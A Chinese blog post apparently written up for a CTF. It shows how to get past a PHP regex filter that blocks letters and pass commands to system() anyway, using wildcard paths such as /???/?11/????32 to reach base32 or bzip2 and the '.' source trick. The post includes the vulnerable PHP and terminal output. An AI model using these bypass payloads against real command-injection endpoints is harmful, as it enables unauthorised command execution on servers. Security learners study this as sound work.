无字母命令执行

最新推荐文章于 2024-08-12 23:29:41 发布
最新推荐文章于 2024-08-12 23:29:41 发布
阅读量1.2k 收藏 2
点赞数 2
分类专栏: CTF 文章标签: php linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WHQ556677/article/details/122246946
版权

先看一道题

<?php
error_reporting(0);
show_source(__FILE__);
if (isset($_GET['a'])) {
    $c=$_GET['a'];
    if (!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)) {
        system($c);
    }else {
        echo "hacker!";
    }
}
?>

代码审计

过滤了字母 分号 反引号 百分号 和 %09 %26 <> 但是可以观察到其实没有过滤空格。

0x01使用 /???/?11/????32 进行绕过

Linux的bin目录一般保存了所有的二进制命令。 cat可以通过/bin/cat 代替。

哪种命令打开文件还能带有数字呢? 可以尝试使用 base64 去打开文件,将文件以base64编码输出

最后只有/???/?11/????32可以

┌──(root💀kali)-[/var/www/html]
└─# /usr/bin/base32 flag.php
MZWGCZ33NBZWQZDIMFTWQ43EONUGOZTWMFTWIZ3WONQX2CQ=
                                                                                                         
┌──(root💀kali)-[/var/www/html]
└─# /???/?11/????32 ????????
MZWGCZ33NBZWQZDIMFTWQ43EONUGOZTWMFTWIZ3WONQX2CQ=

仅适用kali、ubuntu等、centos不适用

因为没有centos 没有base32

0x02 使用 /usr/bin/bzip2 去压缩文件夹绕过

查看可利用

┌──(root💀kali)-[/var/www/html]
└─# locate /???/???/????2
/usr/bin/bzip2
/usr/bin/bzip2recover
/usr/bin/exiv2
/usr/bin/ntlm2
/usr/bin/ragg2
/usr/bin/rasm2
/usr/lib/sasl2

1、/???/???/????2

2、/???/?11/????2

实验环境没效果

其他系统环境

 只有/???/???/????2可以

0x03 使用点(.)去执行sh文件

linux中.相当于source,可以直接执行sh文件

不管有无文件后缀名,都是根据命令来选择打开文件的方式。

使用.执行

kali-2021.2环境不行

换个Linux系统试试可以,诚不欺我!

centos 7 环境可以

ubuntu 12 环境可以

 刚开始kali环境测试不行,后来换其他系统环境可以,以为执行的成功与shell版本有关,最后发现,文件内容仅有ls,也能被 . 执行成功

知识来源链接:命令执行-过滤了字母或者过滤了数字+字母的绕过方法 - Dark1nt - 博客园

咸鱼咸菜
关注
专栏目录
网络安全系列&php系列:php执行先后顺序_CTFweb类型(二十一)无数字字母命令执行及相关例题
weixin_54626591的博客
06-27 754
php执行先后顺序_CTFweb类型(二十一)无数字字母命令执行及相关例题
详解PHP代码执行漏洞--无字母shell
贤鱼的博客
09-08 502
介绍代码执行漏洞中无字母shell脚本及其实操过程
命令执行-无字母数字webshell
leekos的博客,分享web安全相关知识~
12-26 2207
命令执行字母数字webshell
字母数字命令执行
最新发布
Thewei666的博客
08-12 934
处理跨平台的文本文件时遇到了换行符不一致的问题,你可以使用各种工具来转换文件的换行符格式,比如`dos2unix`(将Windows风格的换行符转换为Unix/Linux风格的换行符)和`unix2dos`(将Unix/Linux风格的换行符转换为Windows风格的换行符)等。如果文件是二进制文件,并且包含`0D`作为数据的一部分(而不是作为行的结束符),那么这些`0D`字符将按原样保留,并在执行文件时作为数据的一部分进行处理。可以发现自己编写的文件中只有0a,而临时文件中是0d0a。
RCE绕过:无字母数字webshell之命令执行
2301_78612169的博客
08-11 405
因为禁止了$符号,所以我们无法构造PHP的变量。但是我们在查询资料得到PHP7中,它允许。在linux中~是表示反码,既就是取反。刚好加在前面就可以。来执行函数,第一个括号中可以是任意PHP表达式。这样的方法来执行动态函数的,我们可以通过。1.webshell长度不超过35。2.正则过滤掉了数字字母还有$和_
【bashfuck】bashshell实现无字母命令执行的构造原理
柒月的博客
03-13 1087
整个项目的核心是 Linux终端可以通过$'\xxx'的方式执行命令,xxx是字符ascii码的八进制形式,通过这一点,我们可以通过位运算符号和Linux终端的其他特性,在没有数字的情况下继续构造这样的形式以实现无字母数字仅用几个字符就实现任意命令执行
无数字字母命令执行及相关例题
DKPT的博客
11-24 91
字母数字。
ctfshow web41 无字母数字命令执行
Sapphire037的博客
10-30 2483
1 首先,捋一捋思路,我们可以先看过滤的字符 比如/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i或者/[a-z0-9]/is 这里可以先看P神的一些不包含数字和字母的webshell ,大概意思就是通过一些字符互相运算后构造得到我们的payload,了解基本原理之后,我们再看ctfshow中的这样一道例题 <?php /* # -*- coding: utf-8 -*- # @Author: 羽 # @Date: 2020-09-05 20:31
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
3. 通配符在RCE(远程命令执行)中的利用:在正则表达式和Shell命令中,`?`和`*`具有不同的含义。在正则表达式中,它们用于匹配字符或表达式的出现次数;而在Shell命令行中,它们用于匹配任意字符或长度的字符串。...
php突破命令限制执行系统命令
05-09
php突破命令限制执行系统命令 可以用于ctf 实战 等多领域使用 十分实用,可以用于突破system等命令被限制的时候
命令执行.无参数RCE
E1even的博客
05-25 1314
linux是操作系统,是服务器操作系统,目前大多数都是采用linux服务系统 主要原因就不多说了 命令执行和代码执行 命令执行实在LINUX终端里面进行执行的,功能强大 代码执行仅仅是存在与代码中,进行代码执行,个人认为执行的也就仅仅是简单的print内容 核心是命令执行,而非代码执行 既然说到命令执行是在LINUX终端进行的,那么我们需要调用LINUX下的命令执行函数,比如常见的: system shell_exec exec 这些常见的命令执行函数 而我们常见的代码执行函数,最多的就是exec,我们很
linux 不用./直接执行程序
朴心的博客
08-21 6138
默认linux的PATH变量里面没有包含./,所以你需要加./filename来执行脚本。 这个是基于安全的考虑,你可以自己将./添加到PATH里面,当然这个是不推荐的。 当然,linux的用户home目录下的bin目录在path的范围内,你可以将脚本放到那个目录下,就可以不用./的方式了。
php字母数字构造入门
不想去派出所
11-29 681
1 前置知识 1.1 php中的正则匹配函数 最常见的preg_grep() preg_grep(string $pattern, array $array, int $flags = 0): array|false 返回给定数组array中与模式pattern 匹配的元素组成的数组 其余的正则函数可以在https://www.runoob.com/php/php-pcre.html里学习 1.2 正则匹配式 正则表达式手册:https://tool.oschina.net/uploads/apidocs
php正则 过滤 特殊符号,PHP过滤★等特殊符号的正则
weixin_28802499的博客
03-09 748
PHP过滤★等特殊符号的正则复制代码 代码如下:if(preg_match("/[ '.,:;*?~`!@#$%^&+=)(<>{}]|\]|\[|\/|\\\|\"|\|/",$user)){echo '不要在名字里面整些特殊符号,请只使用字母、数字和汉字,当然要你的浏览器要选简体中文GB2312哟,千万不要选繁体、中文HZ等。返回修改后,再来,我等你哟!';exit();}...
文件包含新姿势~
NLost
10-07 1853
通过修改user-agent文件头为恶意代码,nginx在解析时会将网站的请求日志写入对应的log文件中(其实apache也类似)。
ctfshow-web入门——命令执行(2)(web41-web57)
m0_62905745的博客
03-16 1161
本篇文章是ctfshow的web入门部分的命令执行部分wp(web41-web 57),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
CTFshow命令执行29-123
qq_43534481的博客
08-06 1540
CTFshow命令执行WP
php正则匹配反斜杠问题
leekos的博客,分享web安全相关知识~
12-26 1356
php正则匹配反斜杠问题
[CTFSHOW]命令执行55-74
Huamang的博客
03-05 1609
web 55 if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); } bin目录: bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值